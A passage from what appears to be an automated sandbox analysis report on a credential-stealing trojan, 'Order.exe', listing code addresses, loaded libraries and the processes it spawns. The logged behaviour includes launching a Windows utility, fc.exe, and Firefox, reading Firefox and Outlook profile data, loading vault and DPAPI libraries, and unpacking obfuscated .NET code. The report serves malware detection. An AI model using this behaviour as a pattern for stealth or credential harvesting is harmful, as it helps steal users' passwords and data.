                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039A1AA312_2_039A1AA3
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039ADAC612_2_039ADAC6
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039BFA4912_2_039BFA49
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039B7A4612_2_039B7A46
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03973A6C12_2_03973A6C
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0399591012_2_03995910
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0390995012_2_03909950
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0391B95012_2_0391B950
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039038E012_2_039038E0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0396D80012_2_0396D800
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03901F9212_2_03901F92
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039BFFB112_2_039BFFB1
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_038C3FD512_2_038C3FD5
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_038C3FD212_2_038C3FD2
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039BFF0912_2_039BFF09
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03909EB012_2_03909EB0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0391FDC012_2_0391FDC0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039B1D5A12_2_039B1D5A
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03903D4012_2_03903D40
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039B7D7312_2_039B7D73
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_039BFCF212_2_039BFCF2
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03979C3212_2_03979C32
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03211C5012_2_03211C50
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0320CBA012_2_0320CBA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0320AE4012_2_0320AE40
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0320CDC012_2_0320CDC0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_032013A112_2_032013A1
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_032152E012_2_032152E0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0320B10B12_2_0320B10B
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0321350C12_2_0321350C
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0321351012_2_03213510
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0322B97012_2_0322B970
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03C1038F12_2_03C1038F
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03C1E2BB12_2_03C1E2BB
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03C1E15312_2_03C1E153
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03C1E03812_2_03C1E038
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03C1D5B812_2_03C1D5B8
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_03C1E4EC12_2_03C1E4EC
                Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 0397F290 appears 105 times
                Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 038EB970 appears 277 times
                Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 03947E54 appears 111 times
                Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 0396EA12 appears 86 times
                Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 03935130 appears 58 times
                Source: C:\Users\user\Desktop\Order.exeCode function: String function: 01A3EA12 appears 86 times
                Source: C:\Users\user\Desktop\Order.exeCode function: String function: 01A05130 appears 58 times
                Source: C:\Users\user\Desktop\Order.exeCode function: String function: 01A17E54 appears 111 times
                Source: C:\Users\user\Desktop\Order.exeCode function: String function: 019BB970 appears 277 times
                Source: C:\Users\user\Desktop\Order.exeCode function: String function: 01A4F290 appears 105 times
                Source: Order.exe, 00000000.00000002.1423090538.0000000005310000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Order.exe
                Source: Order.exe, 00000000.00000002.1407556372.000000000095E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Order.exe
                Source: Order.exe, 00000000.00000002.1420057586.0000000002871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Order.exe
                Source: Order.exe, 00000000.00000002.1424310251.00000000070A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Order.exe
                Source: Order.exe, 00000009.00000002.1782237155.0000000001468000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFC.EXEj% vs Order.exe
                Source: Order.exe, 00000009.00000002.1782237155.000000000147C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFC.EXEj% vs Order.exe
                Source: Order.exe, 00000009.00000002.1782419034.0000000001ABD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Order.exe
                Source: Order.exeBinary or memory string: OriginalFilenameUYVh.exed" vs Order.exe
                Source: Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, GrbfCDO2Fb3aiPmKSc.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, GrbfCDO2Fb3aiPmKSc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, GrbfCDO2Fb3aiPmKSc.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, GrbfCDO2Fb3aiPmKSc.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, GrbfCDO2Fb3aiPmKSc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, GrbfCDO2Fb3aiPmKSc.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, vr5o4TCnKABqtW5kUU.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, vr5o4TCnKABqtW5kUU.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@11/8
                Source: C:\Users\user\Desktop\Order.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Order.exe.logJump to behavior
                Source: C:\Users\user\Desktop\Order.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\fc.exeFile created: C:\Users\user~1\AppData\Local\Temp\0349A-nJump to behavior
                Source: Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Order.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: fc.exe, 0000000C.00000003.2025497853.000000000348A000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000C.00000002.3119481100.00000000034B8000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000C.00000002.3119481100.000000000348A000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000C.00000003.2027678662.0000000003494000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Order.exeReversingLabs: Detection: 24%
                Source: unknownProcess created: C:\Users\user\Desktop\Order.exe "C:\Users\user\Desktop\Order.exe"
                Source: C:\Users\user\Desktop\Order.exeProcess created: C:\Users\user\Desktop\Order.exe "C:\Users\user\Desktop\Order.exe"
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
                Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Order.exeProcess created: C:\Users\user\Desktop\Order.exe "C:\Users\user\Desktop\Order.exe"Jump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Order.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Order.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Order.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Order.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Order.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Order.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Order.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Order.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Order.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Order.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Order.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Order.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Order.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Order.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Order.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Order.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Order.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Order.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Order.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: UYVh.pdbSHA256 source: Order.exe
                Source: Binary string: fc.pdb source: Order.exe, 00000009.00000002.1782237155.0000000001468000.00000004.00000020.00020000.00000000.sdmp, lOYqgVWsbtwCn.exe, 0000000B.00000003.1717371395.00000000005F5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: fc.pdbGCTL source: Order.exe, 00000009.00000002.1782237155.0000000001468000.00000004.00000020.00020000.00000000.sdmp, lOYqgVWsbtwCn.exe, 0000000B.00000003.1717371395.00000000005F5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: UYVh.pdb source: Order.exe
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3121159220.00000000001DE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: Order.exe, 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000C.00000003.1789911041.0000000003718000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000C.00000003.1788185386.000000000356D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Order.exe, Order.exe, 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 0000000C.00000003.1789911041.0000000003718000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000C.00000003.1788185386.000000000356D000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: Order.exe, FormTada.cs.Net Code: InitializeComponent
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, GrbfCDO2Fb3aiPmKSc.cs.Net Code: ee6iDshbFw System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, GrbfCDO2Fb3aiPmKSc.cs.Net Code: ee6iDshbFw System.Reflection.Assembly.Load(byte[])
                Source: 11.2.lOYqgVWsbtwCn.exe.58fcd14.1.raw.unpack, FormTada.cs.Net Code: InitializeComponent
                Source: 12.2.fc.exe.3fdcd14.2.raw.unpack, FormTada.cs.Net Code: InitializeComponent
                Source: 16.2.firefox.exe.3b0fcd14.0.raw.unpack, FormTada.cs.Net Code: InitializeComponent
                Source: Order.exeStatic PE information: 0xA7A1B934 [Thu Feb 13 20:29:40 2059 UTC]
                Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_00EBA122 push edx; iretd 0_2_00EBA123
                Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_00EBC441 push cs; iretd 0_2_00EBC44E
                Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_00EBC529 push cs; iretd 0_2_00EBC536
                Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_00EB5718 pushfd ; iretd 0_2_00EB5732
                Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_00EB9C41 push 30028593h; iretd 0_2_00EB9C4D
                Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_06D00013 push es; ret 0_2_06D0001C
                Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_06D0618A push esp; retf 0_2_06D06191
                Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_070923A6 push cs; iretd 0_2_070923A7
                Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_07092971 push esp; iretd 0_2_0709297D
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_0041600F push esp; retf 9_2_00416030
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_00405119 push ss; retf 9_2_0040511A
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_0040AA27 push cs; iretd 9_2_0040AA28
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_004142D9 push esp; retf 9_2_004142DA
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_00403330 push eax; ret 9_2_00403332
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_0041844F push eax; iretd 9_2_00418450
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_004165B3 push 00000032h; ret 9_2_004166AF
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_00416662 push 00000032h; ret 9_2_004166AF
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_00404EDD push ds; iretd 9_2_00404EED
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_00418EF6 pushfd ; ret 9_2_00418F00
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_00416683 push 00000032h; ret 9_2_004166AF
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_00404EB6 push ecx; iretd 9_2_00404EC1
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_0041175E pushad ; retf 9_2_0041176E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_00406737 push eax; retf 9_2_0040673B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_0199225F pushad ; ret 9_2_019927F9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019927FA pushad ; ret 9_2_019927F9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C09AD push ecx; mov dword ptr [esp], ecx9_2_019C09B6
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_0199283D push eax; iretd 9_2_01992858
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01991200 push eax; iretd 9_2_01991369
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeCode function: 11_2_00A4300B push es; ret 11_2_00A42FA5
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeCode function: 11_2_00A349BE push ecx; iretd 11_2_00A349C9
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeCode function: 11_2_00A349E5 push ds; iretd 11_2_00A349F5
                Source: Order.exeStatic PE information: section name: .text entropy: 7.973818624888397
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, LRToqTRMv79ZE70a2X.csHigh entropy of concatenated method names: 'YGEgZRICS4', 'rTWgAY2cRC', 'ASDgRspm3h', 'kWOgUi3cMk', 'E9Ug4Ce3A5', 'EZSgqhySJf', 'Gwog5ZFWli', 'A5hg8GEHrl', 'iQdgK3xXG4', 't8cgbvfLXv'
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, gWrW1AMb5JSFn78s7W.csHigh entropy of concatenated method names: 'Ix1kgetJpC', 'eDakI6SLao', 'OdxkkWvPlk', 'f3HkGWXAhw', 'pjjk6qMRdr', 'cOdkcngYxG', 'Dispose', 'SqdlNxDFni', 'mqBlWWicMY', 'KC5l2tpOZF'
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, QH2qCN3DXJ76e9ZhjZ.csHigh entropy of concatenated method names: 'kmTjYdKSxJ', 'SvvjmgBxRE', 'YLK2qMhpx3', 'pAU25htolF', 'w9J28l8RlI', 'jBJ2K7eGmw', 'ML42bHIqXj', 'Um22B0DLnX', 'SSc2VQf5Vo', 'drQ2ZidQ52'
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, CcSwQRsFuLY5V9HHwb.csHigh entropy of concatenated method names: 'YJhI71DW7D', 'W5WIEwKqIi', 'ToString', 'AnhINhN9Ui', 'kXYIWCvNAS', 'ofrI2yDJ5O', 'ispIj9iPOx', 'rApIJoqq81', 'HiqIfASSQd', 'qswIOmIM1F'
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, IFb9yXHQYsT6aGaYKe.csHigh entropy of concatenated method names: 'W8nDty2cT', 'bfl9Cmjnf', 'NCL0nZ6PK', 'NYMmGGlgW', 'J5Lu9I7iJ', 'T2K3oC9BL', 'vCY8WQFPD0yBysfKnY', 'ohJejHWNy0pVJnbH3P', 'lk1lD2oI2', 'lshLqSR8c'
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, ct5GO8Sa4yp6boot2fh.csHigh entropy of concatenated method names: 'TsPGt2iQSE', 'N9YGzmksKQ', 'YAyvTAOymK', 'WnFpiJxUP25juncTaOG', 'VgANlsxziJyht4pm3YP', 'X35FM7J768gchgT6l2B', 'LeqNdYJ86RvXrp3A8V8'
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, WOvEGlbFUFuoitoiSB.csHigh entropy of concatenated method names: 'yw7fNaC4Oi', 'hXpf2xD1VT', 'J3ifJselXZ', 'ojpJtGRMWn', 'B0UJzHXQle', 'cKtfTivkUA', 'veNfSYMSUq', 'GePfHtWQPi', 'jHxfangAlJ', 'YWrfijYrEx'
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, DmlG0vuofs9SjDZNsk.csHigh entropy of concatenated method names: 'RCD29Zca1R', 'ure20ri5rF', 'Ta92CIC9u6', 'ndE2u33sQ9', 'Vom2g4thvg', 'm8L2dQ5cvE', 'CK42IEgx17', 'fEm2lb5p2d', 'kd22ksKATv', 'AnP2LTG1SD'
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, vLkQu0h9flEgOBwxpG.csHigh entropy of concatenated method names: 'Ee4nCqJVBX', 'jLWnur53f5', 'uaCnX9X61t', 'j4nn4nNKA4', 'cuan5DH1b3', 'V8Dn8dWajt', 'AlAnbaUSbj', 'qkMnB5l5eu', 'd5HnZ1C9yA', 'LAonwuWi7Q'
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, DEcfA0tReK6vAshi84.csHigh entropy of concatenated method names: 'sqcL2PcEO8', 'YMqLjME8JH', 'SkKLJI7WGr', 'py0Lf0TtA9', 'ykhLk5MgUj', 'lSFLOTeU37', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, prCQ0nSTHWVoHsFE2hl.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UyQLwxLNK5', 'hDsLAu8LCL', 'XE5LhEZhAq', 'UVpLRWSyTN', 'KWELUSkWPW', 'I1aLQU5Uyj', 'LLtLssELWt'
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, GrbfCDO2Fb3aiPmKSc.csHigh entropy of concatenated method names: 'm1iaxRBYWS', 'OayaNyUpO3', 'xbeaWHWEGI', 'il9a2iYPVL', 'mUGajydVva', 'MslaJpwdL2', 'sccaf5T6FB', 'kIGaOXC0FH', 'ECIaeTDapI', 'nvSa7cBhxK'
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, vr5o4TCnKABqtW5kUU.csHigh entropy of concatenated method names: 'iRoWR5D8Bn', 'hqTWU5wVQa', 'T3dWQ7xEIs', 'smfWs0n5My', 'nV3WrMICoH', 'rsTWFaMRX2', 'FkgWMRLxu9', 'qpaWy0R0pX', 'QA6W1N52ia', 'wIGWtRghsD'
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, wDVu3IFeNnoDIiIgEw.csHigh entropy of concatenated method names: 'Dg9IyofeUe', 'ejQIt0NDIy', 'OfylTk9g2o', 'SwRlSEK2xh', 'BdsIwGUqn7', 'PgYIApAKTA', 'hn2Ih4OV07', 'QCSIRAMtkD', 'fglIUnL4fc', 'MERIQiVI5y'
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, MDbR9JXFa83jJGxJTI.csHigh entropy of concatenated method names: 'A0bJxDAcZq', 'dnVJWj2p04', 'S7YJjGvqOW', 'FQEJfuDX1n', 'QIcJOLkf6Y', 'lFUjr3k247', 'lZTjFg4nGc', 'y01jMn3D8Y', 'uGkjyt1gTY', 'TtBj13ACgy'
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, S0yPV81WU0AT3cSA2x.csHigh entropy of concatenated method names: 'WqikX0cC0I', 'YVuk4BrYwd', 'qRnkqWxdUh', 'axUk52FyKW', 'RBCk8RIbHb', 'W6dkKNDpDT', 'NVKkbw29hi', 'Y4EkB9TQ8W', 'VKxkV5sksD', 'rMqkZYp0MV'
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, CH8dJ1irwJ3NvXoVkm.csHigh entropy of concatenated method names: 'Rx6Sfr5o4T', 'oKASOBqtW5', 'uofS7s9SjD', 'ONsSEkhH2q', 'AZhSgjZVDb', 'R9JSdFa83j', 'TEl50K01TCkpnhwSZf', 'mJ530PDGxVoYr9YL5I', 'tipSSrCVY0', 'QmjSawHE0E'
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, QIkfoDQ92Aa3eL9Mpc.csHigh entropy of concatenated method names: 'ToString', 'PL8dwp8q86', 'R3pd4pE1Ok', 'Jq9dqmOm1A', 'J8Nd5k4MLp', 'Lp2d8U2xxE', 'XKmdK2Yaw9', 'qLkdbJtB1m', 'FyZdBD7yxC', 'qOVdVsijBJ'
